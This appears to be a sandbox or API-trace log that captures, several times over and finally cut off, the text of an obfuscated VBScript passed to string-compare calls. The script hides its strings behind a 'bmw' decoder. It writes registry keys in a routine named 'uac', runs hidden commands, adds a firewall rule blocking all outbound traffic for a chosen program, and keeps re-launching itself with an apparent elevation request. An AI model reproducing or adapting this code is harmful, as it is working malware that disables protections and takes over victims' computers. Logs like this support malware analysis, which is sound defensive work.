bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.973] wcsncmp (_String1="ction\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.973] wcsncmp (_String1="tion\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.973] wcsncmp (_String1="ion\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.973] wcsncmp (_String1="on\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute 